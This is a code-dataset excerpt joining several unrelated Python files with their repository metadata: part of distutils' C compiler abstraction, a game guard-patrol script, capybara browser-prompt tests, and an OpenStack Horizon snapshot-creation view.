"build/foo/bar.o".
'macros', if given, must be a list of macro definitions. A macro
definition is either a (name, value) 2-tuple or a (name,) 1-tuple.
The former defines a macro; if the value is None, the macro is
defined without an explicit value. The 1-tuple case undefines a
macro. Later definitions/redefinitions/ undefinitions take
precedence.
'include_dirs', if given, must be a list of strings, the
directories to add to the default include file search path for this
compilation only.
'debug' is a boolean; if true, the compiler will be instructed to
output debug symbols in (or alongside) the object file(s).
'extra_preargs' and 'extra_postargs' are implementation- dependent.
On platforms that have the notion of a command-line (e.g. Unix,
DOS/Windows), they are most likely lists of strings: extra
command-line arguments to prepand/append to the compiler command
line. On other platforms, consult the implementation class
documentation. In any event, they are intended as an escape hatch
for those occasions when the abstract compiler framework doesn't
cut the mustard.
'depends', if given, is a list of filenames that all targets
depend on. If a source file is older than any file in
depends, then the source file will be recompiled. This
supports dependency tracking, but only at a coarse
granularity.
Raises CompileError on failure.
"""
# A concrete compiler class can either override this method
# entirely or implement _compile().
macros, objects, extra_postargs, pp_opts, build = \
self._setup_compile(output_dir, macros, include_dirs, sources,
depends, extra_postargs)
cc_args = self._get_cc_args(pp_opts, debug, extra_preargs)
for obj in objects:
try:
src, ext = build[obj]
except KeyError:
continue
self._compile(obj, src, ext, cc_args, extra_postargs, pp_opts)
# Return *all* object filenames, not just the ones we just built.
return objects
def _compile(self, obj, src, ext, cc_args, extra_postargs, pp_opts):
"""Compile 'src' to product 'obj'."""
# A concrete compiler class that does not override compile()
# should implement _compile().
pass
def create_static_lib (self,
objects,
output_libname,
output_dir=None,
debug=0,
target_lang=None):
"""Link a bunch of stuff together to create a static library file.
The "bunch of stuff" consists of the list of object files supplied
as 'objects', the extra object files supplied to
'add_link_object()' and/or 'set_link_objects()', the libraries
supplied to 'add_library()' and/or 'set_libraries()', and the
libraries supplied as 'libraries' (if any).
'output_libname' should be a library name, not a filename; the
filename will be inferred from the library name. 'output_dir' is
the directory where the library file will be put.
'debug' is a boolean; if true, debugging information will be
included in the library (note that on most platforms, it is the
compile step where this matters: the 'debug' flag is included here
just for consistency).
'target_lang' is the target language for which the given objects
are being compiled. This allows specific linkage time treatment of
certain languages.
Raises LibError on failure.
"""
pass
# values for target_desc parameter in link()
SHARED_OBJECT = "shared_object"
SHARED_LIBRARY = "shared_library"
EXECUTABLE = "executable"
def link (self,
target_desc,
objects,
output_filename,
output_dir=None,
libraries=None,
library_dirs=None,
runtime_library_dirs=None,
export_symbols=None,
debug=0,
extra_preargs=None,
extra_postargs=None,
build_temp=None,
target_lang=None):
"""Link a bunch of stuff together to create an executable or
shared library file.
The "bunch of stuff" consists of the list of object files supplied
as 'objects'. 'output_filename' should be a filename. If
'output_dir' is supplied, 'output_filename' is relative to it
(i.e. 'output_filename' can provide directory components if
needed).
'libraries' is a list of libraries to link against. These are
library names, not filenames, since they're translated into
filenames in a platform-specific way (eg. "foo" becomes "libfoo.a"
on Unix and "foo.lib" on DOS/Windows). However, they can include a
directory component, which means the linker will look in that
specific directory rather than searching all the normal locations.
'library_dirs', if supplied, should be a list of directories to
search for libraries that were specified as bare library names
(ie. no directory component). These are on top of the system
default and those supplied to 'add_library_dir()' and/or
'set_library_dirs()'. 'runtime_library_dirs' is a list of
directories that will be embedded into the shared library and used
to search for other shared libraries that *it* depends on at
run-time. (This may only be relevant on Unix.)
'export_symbols' is a list of symbols that the shared library will
export. (This appears to be relevant only on Windows.)
'debug' is as for 'compile()' and 'create_static_lib()', with the
slight distinction that it actually matters on most platforms (as
opposed to 'create_static_lib()', which includes a 'debug' flag
mostly for form's sake).
'extra_preargs' and 'extra_postargs' are as for 'compile()' (except
of course that they supply command-line arguments for the
particular linker being used).
'target_lang' is the target language for which the given objects
are being compiled. This allows specific linkage time treatment of
certain languages.
Raises LinkError on failure.
"""
raise NotImplementedError
# Old 'link_*()' methods, rewritten to use the new 'link()' method.
def link_shared_lib (self,
objects,
output_libname,
output_dir=None,
libraries=None,
library_dirs=None,
runtime_library_dirs=None,
export_symbols=None,
debug=0,
extra_preargs=None,
extra_postargs=None,
build_temp=None,
target_lang=None):
self.link(CCompiler.SHARED_LIBRARY, objects,
self.library_filename(output_libname, lib_type='shared'),
output_dir,
libraries, library_dirs, runtime_library_dirs,
export_symbols, debug,
extra_preargs, extra_postargs, build_temp, target_lang)
def link_shared_object (self,
objects,
output_filename,
output_dir=None,
libraries=None,
library_dirs=None,
runtime_library_dirs=None,
export_symbols=None,
debug=0,
extra_preargs=None,
extra_postargs=None,
build_temp=None,
target_lang=None):
self.link(CCompiler.SHARED_OBJECT, objects,
output_filename, output_dir,
libraries, library_dirs, runtime_library_dirs,
export_symbols, debug,
extra_preargs, extra_postargs, build_temp, target_lang)
def link_executable (self,
objects,
output_progname,
output_dir=None,
libraries=None,
library_dirs=None,
runtime_library_dirs=None,
debug=0,
extra_preargs=None,
extra_postargs=None,
target_lang=None):
self.link(CCompiler.EXECUTABLE, objects,
self.executable_filename(output_progname), output_dir,
libraries, library_dirs, runtime_library_dirs, None,
debug, extra_preargs, extra_postargs, None, target_lang)
# -- Miscellaneous methods -----------------------------------------
# These are all used by the 'gen_lib_options() function; there is
# no appropriate default implementation so subclasses should
# implement all of these.
def library_dir_option (self, dir):
"""Return the compiler option to add 'dir' to the list of
directories searched for libraries.
"""
raise NotImplementedError
def runtime_library_dir_option (self, dir):
"""Return the compiler option to add 'dir' to the list of
directories searched for runtime libraries.
"""
raise NotImplementedError
def library_option (self, lib):
"""Return the compiler option to add 'dir' to the list of libraries
linked into the shared library or executable.
"""
raise NotImplementedError
def has_function(self, funcname,
includes=None,
include_dirs=None,
libraries=None,
library_dirs=None):
"""Return a boolean indicating whether funcname is supported on
the current platform. The optional arguments can be used to
augment the compilation environment.
"""
# this can't be included at module scope because it tries to
# import math which might not be available at that point - maybe
# the necessary logic should just be inlined?
import tempfile
if includes is None:
includes = []
if include_dirs is None:
include_dirs = []
if libraries is None:
libraries = []
if library_dirs is None:
library_dirs = []
fd, fname = tempfile.mkstemp(".c", funcname, text=True)
f = os.fdopen(fd, "w")
for incl in includes:
f.write("""#include "%s"\n""" % incl)
f.write("""\
main (int argc, char **argv) {
%s();
}
""" % funcname)
f.close()
try:
objects = self.compile([fname], include_dirs=include_dirs)
except CompileError:
return False
try:
self.link_executable(objects, "a.out",
libraries=libraries,
library_dirs=library_dirs)
except (LinkError, TypeError):
return False
return True
def find_library_file (self, dirs, lib, debug=0):
"""Search the specified list of directories for a static or shared
library file 'lib' and return the full path to that file. If
'debug' true, look for a debugging version (if that makes sense on
the current platform). Return None if 'lib' wasn't found in any of
the specified directories.
"""
raise NotImplementedError
# -- Filename generation methods -----------------------------------
# The default implementation of the filename generating methods are
# prejudiced towards the Unix/DOS/Windows view of the world:
# * object files are named by replacing the source file extension
# (eg. .c/.cpp -> .o/.obj)
# * library files (shared or static) are named by plugging the
# library name and extension into a format string, eg.
# "lib%s.%s" % (lib_name, ".a") for Unix static libraries
# * executables are named by appending an extension (possibly
# empty) to the program name: eg. progname + ".exe" for
# Windows
#
# To reduce redundant code, these methods expect to find
# several attributes in the current object (presumably defined
# as class attributes):
# * src_extensions -
# list of C/C++ source file extensions, eg. ['.c', '.cpp']
# * obj_extension -
# object file extension, eg. '.o' or '.obj'
# * static_lib_extension -
# extension for static library files, eg. '.a' or '.lib'
# * shared_lib_extension -
# extension for shared library/object files, eg. '.so', '.dll'
# * static_lib_format -
# format string for generating static library filenames,
# eg. 'lib%s.%s' or '%s.%s'
# * shared_lib_format
# format string for generating shared library filenames
# (probably same as static_lib_format, since the extension
# is one of the intended parameters to the format string)
# * exe_extension -
# extension for executable files, eg. '' or '.exe'
def object_filenames(self, source_filenames, strip_dir=0, output_dir=''):
if output_dir is None:
output_dir = ''
obj_names = []
for src_name in source_filenames:
base, ext = os.path.splitext(src_name)
base = os.path.splitdrive(base)[1] # Chop off the drive
base = base[os.path.isabs(base):] # If abs, chop off leading /
if ext not in self.src_extensions:
raise UnknownFileError, \
"unknown file type '%s' (from '%s')" % (ext, src_name)
if strip_dir:
base = os.path.basename(base)
obj_names.append(os.path.join(output_dir,
base + self.obj_extension))
return obj_names
def shared_object_filename(self, basename, strip_dir=0, output_dir=''):
assert output_dir is not None
if strip_dir:
basename = os.path.basename (basename)
return os.path.join(output_dir, basename + self.shared_lib_extension)
def executable_filename(self, basename, strip_dir=0, output_dir=''):
assert output_dir is not None
if strip_dir:
basename = os.path.basename (basename)
return os.path.join(output_dir, basename + (self.exe_extension or ''))
def library_filename(self, libname, lib_type='static', # or 'shared'
strip_dir=0, output_dir=''):
assert output_dir is not None
if lib_type not in ("static", "shared", "dylib"):
raise ValueError, "'lib_type' must be \"static\", \"shared\" or \"dylib\""
fmt = getattr(self, lib_type + "_lib_format")
ext = getattr(self, lib_type + "_lib_extension")
dir, base = os.path.split (libname)
filename = fmt % (base, ext)
if strip_dir:
dir = ''
return os.path.join(output_dir, dir, filename)
# -- Utility methods -----------------------------------------------
def announce (self, msg, level=1):
log.debug(msg)
def debug_print (self, msg):
from distutils.debug import DEBUG
if DEBUG:
print msg
def warn (self, msg):
sys.stderr.write ("warning: %s\n" % msg)
def execute (self, func, args, msg=None, level=1):
execute(func, args, msg, self.dry_run)
def spawn (self, cmd):
spawn (cmd, dry_run=self.dry_run)
def move_file (self, src, dst):
return move_file (src, dst, dry_run=self.dry_run)
def mkpath (self, name, mode=0777):
mkpath (name, mode, dry_run=self.dry_run)
# class CCompiler
# Map a sys.platform/os.name ('posix', 'nt') to the default compiler
# type for that platform. Keys are interpreted as re match
# patterns. Order is important; platform mappings are preferred over
# OS names.
_default_compilers = (
# Platform string mappings
# on a cygwin built python we can use gcc like an ordinary UNIXish
# compiler
('cygwin.*', 'unix'),
('os2emx', 'emx'),
# OS name mappings
('posix', 'unix'),
('nt', 'msvc'),
('mac', 'mwerks'),
)
def get_default_compiler(osname=None, platform=None):
""" Determine the default compiler to use for the given platform.
osname should be one of the standard Python OS names (i.e. the
ones returned by os.name) and platform the common value
returned by sys.platform for the platform in question.
The default values are os.name and sys.platform in case the
parameters are not given.
"""
if osname is None:
osname = os.name
if platform is None:
platform = sys.platform
for pattern, compiler in _default_compilers:
if re.match(pattern, platform) is not None or \
re.match(pattern, osname) is not None:
return compiler
# Default to Unix compiler
return 'unix'
# Map compiler types to (module_name, class_name) pairs -- ie. where to
# find the code that implements an interface to this compiler. (The module
# is assumed to be in the 'distutils' package.)
compiler_class = { 'unix': ('unixccompiler', 'UnixCCompiler',
"standard UNIX-style compiler"),
'msvc': ('msvccompiler', 'MSVCCompiler',
"Microsoft Visual C++"),
'cygwin': ('cygwinccompiler', 'CygwinCCompiler',
"Cygwin port of GNU C Compiler for Win32"),
'mingw32': ('cygwinccompiler', 'Mingw32CCompiler',
"Mingw32 port of GNU C Compiler for Win32"),
'bcpp': ('bcppcompiler', 'BCPPCompiler',
"Borland C++ Compiler"),
'mwerks': ('mwerkscompiler', 'MWerksCompiler',
"MetroWerks CodeWarrior"),
'emx': ('emxccompiler', 'EMXCCompiler',
"EMX port of GNU C Compiler for OS/2"),
}
def show_compilers():
"""Print list of available compilers (used by the "--help-compiler"
options to "build", "build_ext", "build_clib").
"""
# XXX this "knows" that the compiler option it's describing is
# "--compiler", which just happens to be the case for the three
# commands that use it.
from distutils.fancy_getopt import FancyGetopt
compilers = []
for compiler in compiler_class.keys():
compilers.append(("compiler="+compiler, None,
compiler_class[compiler][2]))
compilers.sort()
pretty_printer = FancyGetopt(compilers)
pretty_printer.print_help("List of available compilers:")
def new_compiler (plat=None,
compiler=None,
verbose=0,
dry_run=0,
force=0):
"""Generate an instance of some CCompiler subclass for the supplied
platform/compiler combination. 'plat' defaults to 'os.name'
(eg. 'posix', 'nt'), and 'compiler' defaults to the default compiler
for that platform. Currently only 'posix' and 'nt' are supported, and
the default compilers are "traditional Unix interface" (UnixCCompiler
class) and Visual C++ (MSVCCompiler class). Note that it's perfectly
possible to ask for a Unix compiler object under Windows, and a
Microsoft compiler object under Unix -- if you supply a value for
'compiler', 'plat' is ignored.
"""
if plat is None:
plat = os.name
try:
if compiler is None:
compiler = get_default_compiler(plat)
(module_name, class_name, long_description) = compiler_class[compiler]
except KeyError:
msg = "don't know how to compile C/C++ code on platform '%s'" % plat
if compiler is not None:
msg = msg + " with '%s' compiler" % compiler
raise DistutilsPlatformError, msg
try:
module_name = "distutils." + module_name
__import__ (module_name)
module = sys.modules[module_name]
klass = vars(module)[class_name]
except ImportError:
raise DistutilsModuleError, \
"can't compile C/C++ code: unable to load module '%s'" % \
module_name
except KeyError:
raise DistutilsModuleError, \
("can't compile C/C++ code: unable to find class '%s' " +
"in module '%s'") % (class_name, module_name)
# XXX The None is necessary to preserve backwards compatibility
# with classes that expect verbose to be the first positional
# argument.
return klass (None, dry_run, force)
def gen_preprocess_options (macros, include_dirs):
"""Generate C pre-processor options (-D, -U, -I) as used by at least
two types of compilers: the typical Unix compiler and Visual C++.
'macros' is the usual thing, a list of 1- or 2-tuples, where (name,)
means undefine (-U) macro 'name', and (name,value) means define (-D)
macro 'name' to 'value'. 'include_dirs' is just a list of directory
names to be added to the header file search path (-I). Returns a list
of command-line options suitable for either Unix compilers or Visual
C++.
"""
# XXX it would be nice (mainly aesthetic, and so we don't generate
# stupid-looking command lines) to go over 'macros' and eliminate
# redundant definitions/undefinitions (ie. ensure that only the
# latest mention of a particular macro winds up on the command
# line). I don't think it's essential, though, since most (all?)
# Unix C compilers only pay attention to the latest -D or -U
# mention of a macro on their command line. Similar situation for
# 'include_dirs'. I'm punting on both for now. Anyways, weeding out
# redundancies like this should probably be the province of
# CCompiler, since the data structures used are inherited from it
# and therefore common to all CCompiler classes.
pp_opts = []
for macro in macros:
if not (type (macro) is TupleType and
1 <= len (macro) <= 2):
raise TypeError, \
("bad macro definition '%s': " +
"each element of 'macros' list must be a 1- or 2-tuple") % \
macro
if len (macro) == 1: # undefine this macro
pp_opts.append ("-U%s" % macro[0])
elif len (macro) == 2:
if macro[1] is None: # define with no explicit value
pp_opts.append ("-D%s" % macro[0])
else:
# XXX *don't* need to be clever about quoting the
# macro value here, because we're going to avoid the
# shell at all costs when we spawn the command!
pp_opts.append ("-D%s=%s" % macro)
for dir in include_dirs:
pp_opts.append ("-I%s" % dir)
return pp_opts
# gen_preprocess_options ()
def gen_lib_options (compiler, library_dirs, runtime_library_dirs, libraries):
"""Generate linker options for searching library directories and
linking with specific libraries. 'libraries' and 'library_dirs' are,
respectively, lists of library names (not filenames!) and search
directories. Returns a list of command-line options suitable for use
with some compiler (depending on the two format strings passed in).
"""
lib_opts = []
for dir in library_dirs:
lib_opts.append (compiler.library_dir_option (dir))
for dir in runtime_library_dirs:
opt = compiler.runtime_library_dir_option (dir)
if type(opt) is ListType:
lib_opts = lib_opts + opt
else:
lib_opts.append (opt)
# XXX it's important that we *not* remove redundant library mentions!
# sometimes you really do have to say "-lfoo -lbar -lfoo" in order to
# resolve all symbols. I just hope we never have to say "-lfoo obj.o
# -lbar" to get things to work -- that's certainly a possibility, but a
# pretty nasty way to arrange your C code.
for lib in libraries:
(lib_dir, lib_name) = os.path.split (lib)
if lib_dir:
lib_file = compiler.find_library_file ([lib_dir], lib_name)
if lib_file:
lib_opts.append (lib_file)
else:
compiler.warn ("no library file corresponding to "
"'%s' found (skipping)" % lib)
else:
lib_opts.append (compiler.library_option (lib))
return lib_opts
# gen_lib_options ()
| gpl-2.0 | -3,102,594,236,466,928,000 | 39.947148 | 86 | 0.594317 | false |
nickthecoder/itchy | resources/Cover-of-Darkness/scripts/guard.py | 1 | 5272 | from common import *
properties = ArrayList()
properties.add( DoubleProperty( "forwardSpeed" ) )
properties.add( DoubleProperty( "turnSpeed" ) )
properties.add( StringProperty( "routeString" ) )
properties.add( BooleanProperty( "debug" ) )
# routeString is a set of parts separated by spaces.
# A part is either a number, or a command letter followed by a number.
# The command letters are as follows:
# L - Turn left n degrees.
# R - Turn right n degrees.
# <no command> - Move forwards n pixels
# C - Move in an arc n pixels, where the amount of turn is given in the NEXT part,
# which should be either an L or a R command.
class Guard(AbstractRole) :
def __init__(self) :
self.routeString = "L360 R360"
self.forwardSpeed = 1
self.turnSpeed = 1
self.steps = 0
self.stepsTaken = 0
self.routeIndex = 0
self.turnAmount = 1
self.forwardAmount = 0
self.debug = False
def onBirth(self) :
self.torch = self.actor.createCompanion("torch").role
self.torch.actor.direction = self.actor.direction
self.torch.owner = self
if self.debug :
print "Starting at :", self.actor.x, self.actor.y, "direction", self.actor.direction
self.startX = self.actor.x
self.startY = self.actor.y
self.startDirection = self.actor.direction
self.addTag("guard")
def tick(self) :
if self.stepsTaken >= self.steps :
self.nextPart()
# The "C" command needs a bodge to keep it symetric. So we make a half step forward at the beginnging
# and a half step at the end without a turn.
if self.turnAmount != 0 and self.forwardAmount != 0 :
self.steps += 1
self.stepsTaken += 1
if self.turnAmount != 0 and self.forwardAmount != 0 and self.stepsTaken == 1 :
# Do the half step at the beginning.
self.actor.moveForwards( self.forwardAmount / 2)
elif self.turnAmount != 0 and self.forwardAmount != 0 and self.stepsTaken == self.steps :
# Half step at the end WITHOUT a turn after it.
self.actor.moveForwards( self.forwardAmount / 2)
return
else :
# Normal step
if self.forwardAmount != 0 :
self.actor.moveForwards( self.forwardAmount )
# Turn
if self.turnAmount != 0 :
self.actor.direction += self.turnAmount
self.torch.actor.direction += self.turnAmount
if self.collided( "door" ) :
game.director.restartScene()
def nextPart(self) :
self.stepsTaken = 0
parts = self.routeString.split();
if self.routeIndex >= len( parts ) :
self.routeIndex = 0
if self.debug :
print "Ending at :", self.actor.x, self.actor.y, "direction", self.actor.direction
self.actor.x = self.startX
self.actor.y = self.startY
self.actor.direction = self.startDirection
self.torch.actor.direction = self.startDirection
part = parts[ self.routeIndex ]
self.routeIndex += 1
#try :
command = part[0:1].upper()
value = float( part[1:] ) if command.isalpha() else float( part )
if command == "L" or command == "R" :
# Calculate the number of steps needed, and the how far round each step has to be.
# turnAmount will be close to, but not always exactly the same as self.turnSpeed.
self.steps = int( value / self.turnSpeed )
self.turnAmount = value / self.steps
self.forwardAmount = 0
if command == "R":
self.turnAmount = - self.turnAmount
elif command == "S" :
self.steps = int(value * 60)
self.forwardAmount = 0
self.turnAmount = 0
elif command == "T" :
self.steps = int(value)
self.forwardAmount = 0
self.turnAmount = 0
else :
# Calculate the number of steps needed, and then how far each step has to be.
# forwardAmount will be close to, but not always exactly the same as self.speed.
self.steps = int( value / self.forwardSpeed )
self.forwardAmount = value / self.steps
self.turnAmount = 0
# Command C is a CURVE - use the next part to work out the angle to turn and this part for the length,
# and do them simultaneously.
if len(parts) > 1 and command == "C" :
tmpSteps = self.steps
self.nextPart()
self.turnAmount = self.turnAmount * self.steps / tmpSteps
self.steps = tmpSteps
self.forwardAmount = value / self.steps
#except :
# print "Guard skipping", part
# Boiler plate code - no need to change this
def getProperties(self):
return properties
# Boiler plate code - no need to change this
def getClassName(self):
return ClassName( Role, self.__module__ + ".py" )
| gpl-3.0 | -537,064,699,696,413,000 | 34.38255 | 114 | 0.569803 | false |
elliterate/capybara.py | capybara/tests/session/test_dismiss_prompt.py | 1 | 1103 | import pytest
from capybara.exceptions import ModalNotFound
@pytest.mark.requires("modals")
class TestDismissPrompt:
@pytest.fixture(autouse=True)
def setup_session(self, session):
session.visit("/with_js")
def test_dismisses_the_prompt(self, session):
with session.dismiss_prompt():
session.click_link("Open prompt")
assert session.has_xpath("//a[@id='open-prompt' and @response='dismissed']")
def test_raises_an_error_if_no_prompt_found(self, session):
with pytest.raises(ModalNotFound):
with session.dismiss_prompt():
pass
def test_dismisses_the_prompt_if_the_message_matches(self, session):
with session.dismiss_prompt("Prompt opened"):
session.click_link("Open prompt")
assert session.has_xpath("//a[@id='open-prompt' and @response='dismissed']")
def test_raises_error_if_the_message_does_not_match(self, session):
with pytest.raises(ModalNotFound):
with session.dismiss_prompt("Incorrect Text"):
session.click_link("Open prompt")
| mit | -5,652,679,203,035,957,000 | 35.766667 | 84 | 0.658205 | false |
fajoy/horizon-example | openstack_dashboard/dashboards/project/images_and_snapshots/snapshots/views.py | 1 | 2200 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Views for managing instance snapshots.
"""
import logging
from django.core.urlresolvers import reverse
from django.core.urlresolvers import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from openstack_dashboard import api
from .forms import CreateSnapshot
LOG = logging.getLogger(__name__)
class CreateView(forms.ModalFormView):
form_class = CreateSnapshot
template_name = 'project/images_and_snapshots/snapshots/create.html'
success_url = reverse_lazy("horizon:project:images_and_snapshots:index")
def get_object(self):
if not hasattr(self, "_object"):
try:
self._object = api.nova.server_get(self.request,
self.kwargs["instance_id"])
except:
redirect = reverse('horizon:project:instances:index')
exceptions.handle(self.request,
_("Unable to retrieve instance."),
redirect=redirect)
return self._object
def get_initial(self):
return {"instance_id": self.kwargs["instance_id"]}
def get_context_data(self, **kwargs):
context = super(CreateView, self).get_context_data(**kwargs)
context['instance'] = self.get_object()
return context
| apache-2.0 | 3,185,531,436,873,776,600 | 32.846154 | 78 | 0.67 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.